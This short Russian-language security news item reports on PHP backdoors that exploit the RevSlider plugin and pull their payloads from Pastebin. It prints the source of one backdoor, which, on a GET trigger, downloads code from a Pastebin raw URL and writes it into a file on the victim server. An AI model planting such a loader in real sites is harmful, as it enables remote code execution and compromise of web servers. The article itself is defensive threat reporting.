Хакер #305. Многошаговые SQL-инъекции
Специалист по безопасности Денис Синегубко из компании Sucuri рассказывает о нескольких бэкдорах, которые используют известный сервис Pastebin для размещения своего кода. В момент заражения код скачивается, сохраняется в файл на компьютере жертвы и запускается на исполнение.
Бэкдоры в показанных примерах используют уязвимость в плагине RevSlider, и во всех остальных отношениях являются типичными представителями своего вида. Например, вот исходный код одного из них.
if(array_keys($_GET)[0] == 'up'){
$content = file_get_contents("http://pastebin . com/raw.php?i=JK5r7NyS");
if($content){unlink('evex.php');
$fh2 = fopen("evex.php", 'a');
fwrite($fh2,$content);
fclose($fh2);
}}else{print "test";}
Собственно, Pastebin предназначен как раз для этого: хостинга исходников. Сайт разрешает скачивать каждый фрагмент исходного кода в «сыром» формате (raw.php в вышеприведённом листинге), то есть без элементов интерфейса сайта.
Есть и пример более искусного бэкдора, который использует Pastebin.
Переменная $temp закодирована в Base64, а после раскодирования тоже показывает ссылку на Pastebin.
Интересно, что существует даже специальный обфускатор, который предусматривает хостинг кода обфусцированной программы на Pastebin. Кодировщик называется FathurFreakz (альтернативное название: PHP Encryptor by Yogyakarta Black Hat).